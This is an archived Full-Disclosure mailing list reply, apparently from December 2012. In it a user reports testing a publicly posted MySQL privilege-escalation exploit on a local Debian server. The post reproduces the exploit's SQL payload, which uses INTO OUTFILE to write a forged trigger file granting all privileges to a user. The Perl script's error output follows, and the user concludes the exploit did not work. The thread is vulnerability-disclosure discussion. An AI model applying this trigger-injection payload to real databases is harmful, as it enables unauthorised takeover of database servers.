lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Mon, 3 Dec 2012 15:01:38 -0500
From: Eren Yağdıran <erenyagdiran@...il.com>
To: king cope <isowarez.isowarez.isowarez@...glemail.com>
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
	submit@...sec.com, todd@...ketstormsecurity.org
Subject: Re: MySQL (Linux) Database Privilege Elevation
	Zeroday Exploit

Hello guys

i tried this zero day exploit on my local machine

Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch
mod_ssl/2.2.9 OpenSSL/0.9.8g
Database client version: libmysql - 5.0.51a

my exploit output is

select 'TYPE=TRIGGERS' into outfile'/var/lib/mysql/ieee/rootme.TRG'
LINES TERMINATED BY '\ntriggers=\'CREATE DEFINER=`root`@...calhost`
trigger atk after insert on rootme for each row\\nbegin \\nUPDATE
mysql.user SET Select_priv=\\\'Y\\\', Insert_priv=\\\'Y\\\',
Update_priv=\\\'Y\\\', Delete_priv=\\\'Y\\\', Create_priv=\\\'Y\\\',
Drop_priv=\\\'Y\\\', Reload_priv=\\\'Y\\\', Shutdown_priv=\\\'Y\\\',
Process_priv=\\\'Y\\\', File_priv=\\\'Y\\\', Grant_priv=\\\'Y\\\',
References_priv=\\\'Y\\\', Index_priv=\\\'Y\\\', Alter_priv=\\\'Y\\\',
Show_db_priv=\\\'Y\\\', Super_priv=\\\'Y\\\',
Create_tmp_table_priv=\\\'Y\\\', Lock_tables_priv=\\\'Y\\\',
Execute_priv=\\\'Y\\\', Repl_slave_priv=\\\'Y\\\',
Repl_client_priv=\\\'Y\\\', Create_view_priv=\\\'Y\\\',
Show_view_priv=\\\'Y\\\', Create_routine_priv=\\\'Y\\\',
Alter_routine_priv=\\\'Y\\\', Create_user_priv=\\\'Y\\\',
Event_priv=\\\'Y\\\', Trigger_priv=\\\'Y\\\', ssl_type=\\\'Y\\\',
ssl_cipher=\\\'Y\\\', x509_issuer=\\\'Y\\\', x509_subject=\\\'Y\\\',
max_questions=\\\'Y\\\', max_updates=\\\'Y\\\',
max_connections=\\\'Y\\\' WHERE
User=\\\'ieee\\\';\\nend\'\nsql_modes=0\ndefiners=\'root@...alhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';DBD::mysql::db
do failed: Access denied for user 'ieee'@...calhost' (using password:
YES) at org.pl line 31.
DBD::mysql::db do failed: Access denied for user 'ieee'@...calhost'
(using password: YES) at org.pl line 32.
DBD::mysql::db do failed: Lost connection to MySQL server during query
at org.pl line 35.
DBD::mysql::db do failed: Lost connection to MySQL server during query
at org.pl line 44.
DBD::mysql::db do failed: Access denied; you need the CREATE USER
privilege for this operation at org.pl line 52.
DBD::mysql::db do failed: Access denied for user 'ieee'@...calhost'
(using password: YES) at org.pl line 53.
DBD::mysql::db do failed: Lost connection to MySQL server during query
at org.pl line 54.
DBI connect('host=localhost;','rootedbox2',...) failed: Access denied
for user 'rootedbox2'@...calhost' (using password: YES) at org.pl line
58
Can't call method "prepare" on an undefined value at org.pl line 62.

I think its not working.


On Sat, Dec 1, 2012 at 4:26 PM, king cope
<isowarez.isowarez.isowarez@...glemail.com> wrote:
> (see attachment)
>
> Cheerio,
>
> Kingcope



-- 
-
Eren Yağdıran
http://www.about.me/eren

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists